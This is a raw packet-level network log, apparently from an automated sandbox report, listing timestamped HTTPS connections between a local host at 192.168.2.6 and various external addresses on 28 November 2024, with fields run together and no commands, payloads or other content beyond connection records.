                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.296704054 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.356626034 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.356646061 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.356736898 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.356758118 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.357836008 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.357872009 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.357881069 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.427890062 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.427903891 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.547425032 CET49706443192.168.2.620.190.181.5
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.547502041 CET49706443192.168.2.620.190.181.5
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.667337894 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.667543888 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.667599916 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.667649984 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.667695999 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.765182972 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.809088945 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.099755049 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.099771976 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.099828005 CET49706443192.168.2.620.190.181.5
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.103853941 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.103909016 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.103970051 CET49706443192.168.2.620.190.181.5
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.112222910 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.112328053 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.112390995 CET49706443192.168.2.620.190.181.5
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.120841980 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.120913029 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.120991945 CET49706443192.168.2.620.190.181.5
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.129055023 CET4434970620.190.181.5192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.185420036 CET49706443192.168.2.620.190.181.5
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.190093994 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.190110922 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.190119982 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.190126896 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.190207958 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.190212011 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.513628006 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.579260111 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.596313953 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.597424030 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.602251053 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.628700018 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.628712893 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.631324053 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.631329060 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.663135052 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.663144112 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.663266897 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.663280010 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.663659096 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.663664103 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.663799047 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.663803101 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.671082020 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.761703014 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:28.761717081 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.025317907 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.025384903 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.025429964 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.044409037 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.044471979 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.044523001 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.050164938 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.050220966 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.050272942 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.050406933 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.050420046 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.050431967 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.050436974 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.066131115 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.066137075 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.066157103 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.066160917 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.078609943 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.078619957 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.078633070 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.078638077 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.086447001 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.102452040 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.102468014 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.112478971 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.112483978 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.118329048 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.118334055 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.165796041 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.165802956 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.175930023 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.176132917 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.176148891 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.177227020 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.177274942 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.219121933 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.219307899 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.219337940 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.263334990 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.387394905 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.387408018 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.428406954 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.432039022 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.432065010 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.497272968 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.548486948 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.548547983 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.606314898 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.606328964 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.608763933 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.608776093 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.629513979 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.635536909 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.679352999 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.685125113 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.685218096 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.685264111 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.693464041 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.693481922 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.874541998 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.902555943 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.902585030 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.047514915 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.050729990 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.052306890 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.052325964 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.061391115 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.061400890 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.065594912 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.065601110 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.068862915 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.068870068 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.109000921 CET49773443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.109039068 CET44349773172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.109175920 CET49773443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.109375954 CET49773443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.109390020 CET44349773172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.248656988 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.262562990 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.262581110 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.449845076 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.452613115 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.452632904 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.455658913 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.455709934 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.455787897 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.456724882 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.456741095 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.550796032 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.554270029 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.554284096 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.557885885 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.603324890 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.751954079 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.754693985 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.754733086 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.906584024 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.909559965 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.909646988 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.909658909 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.925759077 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.925765038 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.928029060 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.928040028 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.928616047 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.928620100 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.072552919 CET49786443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.072582960 CET4434978618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.072637081 CET49786443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.072921038 CET49786443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.072937012 CET4434978618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.107717991 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.110956907 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.110979080 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.308828115 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.323909998 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.323945045 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.414426088 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.440265894 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.440309048 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.442136049 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.487339020 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.615591049 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.620722055 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.620740891 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.682337999 CET49773443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.682912111 CET49786443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.683274984 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.683298111 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.683368921 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.686204910 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.686214924 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.723334074 CET44349773172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.723357916 CET4434978618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.771310091 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.774408102 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.774579048 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.774600029 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.789237976 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.789243937 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.790482998 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.790488005 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.793493986 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.793498993 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.818639040 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.818686008 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.818804026 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.819067955 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.819083929 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822252989 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822289944 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822556973 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822756052 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822772980 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.823095083 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.823106050 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.823169947 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.824542999 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.824569941 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.972506046 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.975198984 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.975224018 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.108578920 CET44349773172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.108649969 CET49773443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.177480936 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.180742979 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.180773020 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.273286104 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.276678085 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.276694059 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.278537035 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.319335938 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.474313021 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.477706909 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.477735996 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.486695051 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.486747026 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.486932039 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.487215996 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.487229109 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.564649105 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.565152884 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.565176964 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.565946102 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.565951109 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.595798016 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.595835924 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.595911980 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.596110106 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.596122980 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.611605883 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.611637115 CET44349811172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.611704111 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.611855984 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.611870050 CET44349811172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.631097078 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.634320021 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.636476040 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.636491060 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.641500950 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.641513109 CET4434973213.107.246.63192.168.2.6
